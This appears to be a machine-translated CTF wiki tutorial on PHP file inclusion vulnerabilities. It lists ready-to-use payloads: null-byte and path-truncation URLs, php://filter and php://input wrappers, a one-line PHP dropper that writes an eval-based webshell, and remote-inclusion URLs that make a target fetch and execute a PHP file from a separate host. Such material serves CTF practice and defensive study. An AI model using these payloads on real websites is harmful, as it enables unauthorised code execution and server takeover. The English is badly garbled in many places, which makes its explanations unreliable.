File Inclusion Vulnerabilities
File contains the Introduction
Application developers in the process of writing a program, do not like to write several times a same code, so the code will usually require repeated use of a single written document, when you want to use directly call up the file, not the need to re-write, call this process is called contains. We need to call a file and they will by the PHP function reference file, if the file name is not passed in time after a reasonable verification, thereby operating a file other than expected, it will result in unexpected or even malicious file disclosure Code injection
Hazard function
PHP function in the file that contains the vulnerability of the most common are the following four:
require()
require_once()
include()
include_once()
When using these functions include a new file, as long as the contents of the file match the syntax of PHP, then expand any file name can be parsed as PHP, such as uploading a txt./ jpg contains malicious code. Files will PHP file is treated as execution.
classification
Local file contains
- Flag directly read files on the target machine
Remote File Inclusion
- On the designated third-party server that can run PHP Trojans, get webshell, view the flag file
Problem-solving ideas
View php global configuration file php.ini
allow_url_fopen = on/off
allow_url_include = on/off
Only these two are only open when there is a remote file containing
Local file contains
Direct file contains flag
Flag by reading the code PHP pseudo-protocol
Incoming Trojan PHP get webshell, get flag
Direct file contains flag
00% cut
Terminator: \ x00 ->% 00
Truncated path length
The maximum length of the directory under Windows 256 bytes, the excess will be discarded; directory under the Linux maximum length of 4096 bytes, the excess will be discarded. example:
http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
No cut-off point
windows OS, number of points need to be longer than 256
http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
PHP pseudo-protocol
- file: // - access to the local file system
- php: // - to access the various input and output streams
file://
Usage: file: // [absolute path and file name of the file]
条件(php.ini) : allow_url_fopen = off/on allow_url_include = off/on
php://filter
usage:
?filename=php://filter/convert.base64-encode/resource=xxx.php
条件(php.ini) : allow_url_fopen = off/on allow_url_include = off/on
Incoming Trojan PHP get webshell, get flag
php://input
Usage:? File = php: // input data using the POST pass in the past
条件(php.ini) : allow_url_fopen = off/on allow_url_include = on
Trojan file (shell.php)
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
Kitchen knife / sword ant connection
Remote File Inclusion
Bypassing the question mark
http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?
# No. bypass
http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23
20% bypass
http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20